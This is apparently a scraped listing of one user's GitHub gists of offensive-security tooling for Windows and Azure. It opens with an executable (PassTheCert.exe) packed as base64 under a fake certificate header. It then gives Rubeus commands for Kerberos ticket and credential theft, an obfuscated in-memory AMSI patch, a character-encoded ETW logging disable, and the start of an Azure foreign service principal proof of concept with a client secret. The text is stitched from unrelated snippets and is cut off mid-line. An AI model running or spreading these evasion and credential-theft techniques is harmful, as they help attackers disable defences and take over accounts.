

-----BEGIN CERTIFICATE-----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-----BEGIN CERTIFICATE-----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-----BEGIN CERTIFICATE-----
UEsDBDMAAQBjAE9/ilkAAAAAbS8AAAB6AAAPAAsAUGFzc1RoZUNlcnQuZXhlAZkH
AAIAQUUDCACesl4pid56vnjfgDFU+Lx4jCIpjuO8vb/AJcB58pqMJPus2W1qMa3N
BK5m2DauasClpiEvTZ0kd3PkY/ocVaGKDFaX69Qmmhc7WRlekt0n5pY2EV3ReEwb
RIBvP0f2snJCc2tSO7ePIpcsgsGdKnxpIEbQqsEKA4ZxWIL4TiJ1/iBCgnldTx0v
SqcWi0pCb3wZeYo1VpY3CwXXdBhX7Jm/YND3dXIXX8euI5Wxls7vZ+tHWyH7mSWA
THZAyvaKVbKJq8E0omY2KpA3rc6jgO3SfhQQzgvEGZXbvIyM2sZ6KnnAFXsBPucS
Kx2QyLvAWFJ/wmKBJfJGE2F7QW9ZTAE+YtkZPbkSqGvfcpiwKQ/4uUvsT+v3Qlhl
QhNVf5Tvr09+n2eJcrh/gE4m+GCce80aLWXgHiYPbe5p2mK+IyLUPwqykNCtXRAV
vPa35+G49EWTcYFJjlRN22BXOy7ySZSWFsrqYBOrOeGjcfSzLxWLbNPpgYo4aEkW
Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:dev.cyberbotic.io /username:bfarmer /password:FakePass123 /dc:dc1.asd.ch /show
Rubeus.exe asktgt /getcredentials /password:"password_you_set" /user:user_you_impersonating /certificate:yourcert.pfx /domain:alexlab.local /dc:dc01 /show
$teststring = "AMSI Test Sample: " + "7e72c3ce-861b-4339-8740-0ac1484c1386"
Invoke-Expression $teststring
m8r1us / AMSI
Created December 10, 2024 13:03
$data = @"
usi-ng Syst-em;usi-ng Syst-em.R-untime.Int-eropS-ervices;us-ing Syst-em.Thr-ead-ing;pub-lic c-lass Pr-ogram{- [D-llIm-port("ker-ne-l3-2")] pub-l-ic static e-x-tern IntPtr GetP-ro-cA-ddr-ess(IntPtr hMo-du-le, str-in-g proc-Na-me); [D-llIm-port("ke-rne-l3-2")] pub-l-ic static e-x-tern IntPtr Lo-ad-Li-brary(str-in-g na-me); [D-llIm-port("ke-rn-el32")] pub-l-ic static e-x-tern bo-ol V-irtualPr-ot-ect(IntPtr lpAd-dr-ess, U-In-t32 dw-S-ize, uint flN-ew-Pr-ot-ect, out uint lpflO-ld-Pr-ot-ect); pub-lic stat-ic void Ru-n() { Int-Ptr li-b = Lo-a-dLi-b-rary("a"+"m"+"si."+"d"+"l"+"l"); IntPt-r am-s-i = GetPr-o-cAddr-e-ss(lib, "A"+"m"+"s"+"iSc"+"anB"+"u-ff-e-r"); In-tPtr fi-nal = IntPtr.Ad-d(a-m-si, 0x9-5); uint old = 0; Vi-r-t-ua-lPr-o-t-ec-t(fi-nal, (UIn-t3-2)0x1, 0x4-0, out old); C-o-nso-l-e.Wr-i-teLi-n-e(old); byt-e[] pat-ch = new by-te[] { 0x75 }; M-a-rsh-a-l.Co-p-y(pat-ch, 0, final, 1); Vi-rt-ua-lPr-o-t-ec-t(fi-nal, (UIn-t32)0x1, o-ld, ou-t ol-d); }}
"@
Add-Type $data.Replace('-
[System.Diagnostics.Eventing.EventProvider]."G`etField"(-join([char[]](109,95,101,110,97,98,108,101,100)),-join([char[]](78,111,110,80,117,98,108,105,99,44,73,110,115,116,97,110,99,101)))."S`etValue"([Ref].Assembly."G`etType"(-join([char[]](83,121,115,116,101,109,46,77,97,110,97,103,101,109,101,110,116,46,65,117,116,111,109,97,116,105,111,110,46,84,114,97,99,105,110,103,46,80,83,69,116,119,76,111,103,80,114,111,118,105,100,101,114)))."G`etField"(-join([char[]](101,116,119,80,114,111,118,105,100,101,114)),-join([char[]](78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99)))."G`etValue"($null),0)
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
m8r1us / PassTheCert.cs
Created April 18, 2024 12:34
modified PassTheCert.cs
// Copyright 2022 Almond (almond.consulting)
//
// Author: Yannick Méheut (ymeheut@almond.consulting)
//
// Accompanying blog post: https://offsec.almond.consulting/authenticating-with-certificates-when-pkinit-is-not-supported.html
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
m8r1us / consentIsTheMindkiller.ps1
Last active April 8, 2024 14:12
Foreign service principal POC
# The script is part of the following article: https://www.scip.ch/en/?labs.20240404
$myTenantId = "cdfdd915-c827-..." # The tenant registering the foreign application (Source: My Tenant)
$foreignTenantId = "d2a16643-37f9-4a19-..." # The tenant who is hosting the application (Source: Foreign Tenant)
$spPassword = "5YB8Q~iFPkt7WXYbqZkzi42BqpPgVJCWR-assd1" # The client secret from the app (Source: Foreign Tenant)
$appName = "foreignApp" # The app name (Source: Foreign Tenant)
# --------------
#Step 0 (Foreign Tenant): Create an application in the portal
# --------------